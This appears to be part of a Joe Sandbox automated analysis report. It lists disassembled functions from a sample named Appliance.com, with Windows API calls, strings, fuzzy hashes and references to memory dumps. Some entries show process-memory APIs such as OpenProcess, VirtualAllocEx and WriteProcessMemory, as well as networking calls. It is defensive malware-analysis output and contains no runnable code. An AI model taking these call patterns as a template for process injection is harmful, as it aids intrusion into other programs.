Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: cb14aa4e57f310059de39470f0f1abc71a49ce4517eb07dcc000ae07361a3096
Instruction ID: a021b99b3921648e7cd5ca82f53a1530c66eae717d33cc299a7f55fb1fad9bad
Opcode Fuzzy Hash: cb14aa4e57f310059de39470f0f1abc71a49ce4517eb07dcc000ae07361a3096
Instruction Fuzzy Hash: 5EF04F75104311BFDB250F66AC49F563B6DEF897A1F100854FA45E7290CA70DC44CA60

Function 00E30CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00E30B24,?,00E33D41,?,00000001,00E03AF4,?), ref: 00E30CCB
CloseHandle.KERNEL32(?,?,?,?,00E30B24,?,00E33D41,?,00000001,00E03AF4,?), ref: 00E30CD8
CloseHandle.KERNEL32(?,?,?,?,00E30B24,?,00E33D41,?,00000001,00E03AF4,?), ref: 00E30CE5
CloseHandle.KERNEL32(?,?,?,?,00E30B24,?,00E33D41,?,00000001,00E03AF4,?), ref: 00E30CF2
CloseHandle.KERNEL32(?,?,?,?,00E30B24,?,00E33D41,?,00000001,00E03AF4,?), ref: 00E30CFF
CloseHandle.KERNEL32(?,?,?,?,00E30B24,?,00E33D41,?,00000001,00E03AF4,?), ref: 00E30D0C

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5b9da90cfe51f6d80d46654d4a9c2dccc493176557d19fcb034a5251d04ef5b3
Instruction ID: 276b16ce0d5f72c1b6bb8e32bcd080d76637ae729194493c03d614dabd962ae6
Opcode Fuzzy Hash: 5b9da90cfe51f6d80d46654d4a9c2dccc493176557d19fcb034a5251d04ef5b3
Instruction Fuzzy Hash: D401A271800B15DFCB30AF66D990816FBF5BF50319715AA3ED19662931C7B0A948DF80

Function 00E265AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00E265BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 00E265D6
MessageBeep.USER32(00000000), ref: 00E265EE
KillTimer.USER32(?,0000040A), ref: 00E2660A
EndDialog.USER32(?,00000001), ref: 00E26624

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: ce1206f08b3d9a4fb209b6e09f81d97295a8e5bbe716b432e53770ca644cc545
Instruction ID: 3a668ff6ee928f6a20beb91060d6e439e5ec5d6192c1ca51e350ce0f92b005dc
Opcode Fuzzy Hash: ce1206f08b3d9a4fb209b6e09f81d97295a8e5bbe716b432e53770ca644cc545
Instruction Fuzzy Hash: A1018630504314AFEB345F51ED4EF967BB8FB00706F000A99E187710E1DBF0AA898A50

Function 00DFDABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00DFDAD2

Part of subcall function 00DF2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4), ref: 00DF2D4E
Part of subcall function 00DF2D38: GetLastError.KERNEL32(00E91DC4,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4,00E91DC4), ref: 00DF2D60

_free.LIBCMT ref: 00DFDAE4
_free.LIBCMT ref: 00DFDAF6
_free.LIBCMT ref: 00DFDB08
_free.LIBCMT ref: 00DFDB1A

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 85f4b0cdc940134dbacb1d6f4003f083bb9d76e84e8ce4c66c1d6201965f61d5
Instruction ID: b4292ae5d67183e3aacf514e8e3493cfd9c1d7e081ad457e9dc54f85cb86788e
Opcode Fuzzy Hash: 85f4b0cdc940134dbacb1d6f4003f083bb9d76e84e8ce4c66c1d6201965f61d5
Instruction Fuzzy Hash: 7CF0EC3254820CAF8624EB59ED85C7A77EFEB4471079A8805F619E7541CA21FC8087B4

Function 00DF2610 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00DF262E

Part of subcall function 00DF2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4), ref: 00DF2D4E
Part of subcall function 00DF2D38: GetLastError.KERNEL32(00E91DC4,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4,00E91DC4), ref: 00DF2D60

_free.LIBCMT ref: 00DF2640
_free.LIBCMT ref: 00DF2653
_free.LIBCMT ref: 00DF2664
_free.LIBCMT ref: 00DF2675

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0d8e5f6e5d50d4a0802d5fb032878b70504f14c6bbe542c2b212c50524e3510d
Instruction ID: 2497e3ffa6ed724efc3e45c06bb79882782680d88de4ee0bee6b50b8a6cad236
Opcode Fuzzy Hash: 0d8e5f6e5d50d4a0802d5fb032878b70504f14c6bbe542c2b212c50524e3510d
Instruction Fuzzy Hash: 7DF030715065199F8A02AF56EC018B83764FF24750306454BF618F63B4C7310E85AFE4

Function 00DF12B7 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00DF1469
__freea.LIBCMT ref: 00DF1487

Part of subcall function 00DF18A7: _free.LIBCMT ref: 00DF18BF

Strings

am/pm, xrefs: 00DF14EA
a/p, xrefs: 00DF154E

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 86e9c7c9eeab7f4b6ce314e866728afc28a20676eb492cf3e50e2d6209a34ce1
Instruction ID: 503860745ed5803dcb1cec87d8255b51fabbacf6233112e0d1bd31983a912e10
Opcode Fuzzy Hash: 86e9c7c9eeab7f4b6ce314e866728afc28a20676eb492cf3e50e2d6209a34ce1
Instruction Fuzzy Hash: C6D1CF7990020EDACB289F68C8557BAB7B1FF55300F2E815AEB46DB250D3759D80CBB0

Function 00E45231 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 315COMMON

Download Yara Rule

APIs

Part of subcall function 00E341FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00E452EE,?,?,00000035,?), ref: 00E34229
Part of subcall function 00E341FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00E452EE,?,?,00000035,?), ref: 00E34239

GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 00E45419
VariantInit.OLEAUT32(?), ref: 00E4550E
VariantClear.OLEAUT32(?), ref: 00E455CD

Strings

bn, xrefs: 00E454ED, 00E455E4

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ErrorLastVariant$ClearFormatInitMessage
String ID: bn
API String ID: 2854431205-2317007323
Opcode ID: 02a41d9d5f7ef35263f066c08d3f769023a965c2f846b158dcc8cde7428707a6
Instruction ID: 78e59f02f5233834d3780bbfb8b09a3eac3859e0b9b77b8f4e23249c29c6cc2a
Opcode Fuzzy Hash: 02a41d9d5f7ef35263f066c08d3f769023a965c2f846b158dcc8cde7428707a6
Instruction Fuzzy Hash: 2BD15AB1900249DFCB14EF95D891EEDBBB4FF08314F54405EE416AB292DB71AA86CF60

Function 00DCCF80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 232COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00DCD253

Strings

t5, xrefs: 00DCCFCF
t5, xrefs: 00DCCFC8
t5, xrefs: 00DCD23A

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Init_thread_footer
String ID: t5$t5$t5
API String ID: 1385522511-3228143211
Opcode ID: 3d7b6d19126c217d81feb598197317dd262aebeb72131b73113b9c6fb09e9eba
Instruction ID: 323e64b0d1fd9777205b383f3f7d797d9f64ccaee6146b59862905a8c64fc1a0
Opcode Fuzzy Hash: 3d7b6d19126c217d81feb598197317dd262aebeb72131b73113b9c6fb09e9eba
Instruction Fuzzy Hash: 23911A75A002069FCB14CF5DC890AAAB7F2FF58314F29816ED995A7340D731E982DBA0

Function 00E461A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?), ref: 00E4623D
_wcslen.LIBCMT ref: 00E46249

Strings

CALLARGARRAY, xrefs: 00E46243, 00E46248
bn, xrefs: 00E461B1, 00E462E1

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY$bn
API String ID: 157775604-1875210186
Opcode ID: b11009821c8bc002613a3aed0e4ede96dc48725e4baad260bd4321e97d0d56f5
Instruction ID: 277d52533a15ae01a4b0f1a4a859e865adf87cadf07906496665eb5b15e7eb45
Opcode Fuzzy Hash: b11009821c8bc002613a3aed0e4ede96dc48725e4baad260bd4321e97d0d56f5
Instruction Fuzzy Hash: 5941B371E00215AFCB04EFA9D8819EEBBF5FF59325F105119E406B7261D7B09D81CB61

Function 00E23063 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E22B1D,?,?,00000034,00000800,?,00000034), ref: 00E2BDF4

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E230AD

Part of subcall function 00E2BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E22B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00E2BDBF

Part of subcall function 00E2BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00E2BD1C
Part of subcall function 00E2BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E22AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E2BD2C
Part of subcall function 00E2BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E22AE1,00000034,?,?,00001004,00000000,00000000), ref: 00E2BD42

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E2311A
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E23167

Strings

@, xrefs: 00E2317F

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: ff0f63333651cc25a231cd419fb80f32655d5880abbb65a7d7f0bd79894715ac
Instruction ID: 9128b8384ee8fd2045da728412ddb76e05579ce74600c4de003defffea12c218
Opcode Fuzzy Hash: ff0f63333651cc25a231cd419fb80f32655d5880abbb65a7d7f0bd79894715ac
Instruction Fuzzy Hash: 09413A72901228BEDB11DFA4DC82ADEBBB8EF49704F005095FA55B7181DA706F89CB61

Function 00DF1A9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\19152\Appliance.com,00000104), ref: 00DF1AD9
_free.LIBCMT ref: 00DF1BA4
_free.LIBCMT ref: 00DF1BAE

Strings

C:\Users\user\AppData\Local\Temp\19152\Appliance.com, xrefs: 00DF1AD0, 00DF1AD7, 00DF1B06, 00DF1B3E

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Local\Temp\19152\Appliance.com
API String ID: 2506810119-2029746458
Opcode ID: b8dfa1d0ee35745e8d187925b6ca9e0702a8b633807acca773bfc29c439aa47a
Instruction ID: 803b69c8b8cfb0da7093ea4f4fb89e402a349891db8ae884e28d31937407dd25
Opcode Fuzzy Hash: b8dfa1d0ee35745e8d187925b6ca9e0702a8b633807acca773bfc29c439aa47a
Instruction Fuzzy Hash: 35316675A0021CEFCB21DB55DC85DAEBBFCEB85710B1581ABEA0497221E6708E45D7B0

Function 00E2CB28 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00E2CBB1
DeleteMenu.USER32(?,00000007,00000000), ref: 00E2CBF7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E929C0,01976D60), ref: 00E2CC40

Strings

0, xrefs: 00E2CB8A

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: a2067758e33d6162d09000f728fb34e20ca808837e0972230943cf537c0f06e7
Instruction ID: 188bd442d1da0e20c15a79634677c1777baed357054d6e7360ddc3b99ff6e3f6
Opcode Fuzzy Hash: a2067758e33d6162d09000f728fb34e20ca808837e0972230943cf537c0f06e7
Instruction Fuzzy Hash: 074193712043129FD724DF24EC85B5EB7E8EF85718F244A2DF569A7291D730E904CB62

Function 00E54EB4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E5DCD0,00000000,?,?,?,?), ref: 00E54F48
GetWindowLongW.USER32 ref: 00E54F65
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E54F75

Strings

SysTreeView32, xrefs: 00E54F1A

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 2a29abb0583e7862952207cfcec0a9edd6f242fc748a45a692038a92e16df417
Instruction ID: 46dddea3c7c6c9134e6d5cd9184eee98403866c47a4fd6e9f47f90ebf1b68406
Opcode Fuzzy Hash: 2a29abb0583e7862952207cfcec0a9edd6f242fc748a45a692038a92e16df417
Instruction Fuzzy Hash: A331C171204205AFDB218E38CC45BDA77A9EB08339F246B19F979B31D0CB70AC949B60

Function 00E43AAB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E43DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00E43AD4,?,?), ref: 00E43DD5

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00E43AD7
_wcslen.LIBCMT ref: 00E43AF8
htons.WSOCK32(00000000,?,?,00000000), ref: 00E43B63

Strings

255.255.255.255, xrefs: 00E43AF2, 00E43AF7

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 4f2ba7dab7d44a5ed673213baf71959f8181ff8a265f9052c607567b0d856489
Instruction ID: df877d03601b7833d463e17d694c2c8df3ecfb8725a30258776f62d6e6522e2d
Opcode Fuzzy Hash: 4f2ba7dab7d44a5ed673213baf71959f8181ff8a265f9052c607567b0d856489
Instruction Fuzzy Hash: 6B31B3356002019FCB20DF79D986FA977F1EF14328F249159E816AB792D731EE45C760

Function 00E54954 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E549DC
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E549F0
SendMessageW.USER32(?,00001002,00000000,?), ref: 00E54A14

Strings

SysMonthCal32, xrefs: 00E549A7

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: db873eff1248f0220d43fb167c45e3f78fda685dd142f037376af8930ffaa3b9
Instruction ID: 7bfe2706d6790b4b3f74a37b94a5d6ecd1f6e9a98897c29124bf9a52a912953e
Opcode Fuzzy Hash: db873eff1248f0220d43fb167c45e3f78fda685dd142f037376af8930ffaa3b9
Instruction Fuzzy Hash: 6A21E172600219BBDF158F50CC42FEB3B69EF48718F111614FE057B0D0D6B1E8959B90

Function 00E550F1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E551A3
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E551B1
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E551B8

Strings

msctls_updown32, xrefs: 00E55122

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 1a0a67955e6207da7f8596fd20d05e9fb94a8d95f8a380116ea2d85a782cf3d0
Instruction ID: f8df6cc5775c6f0f6528fcc391541c0a23792d46e245f472024ca09c2b58b1b6
Opcode Fuzzy Hash: 1a0a67955e6207da7f8596fd20d05e9fb94a8d95f8a380116ea2d85a782cf3d0
Instruction Fuzzy Hash: 962162B5601A49AFDB14DF24CC91EBB37ADEF59368B041459FA00A7361CB70EC19CBA0

Function 00E54253 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E542DC
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E542EC
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E54312

Strings

Listbox, xrefs: 00E542AB

Memory Dump Source

Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true

Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
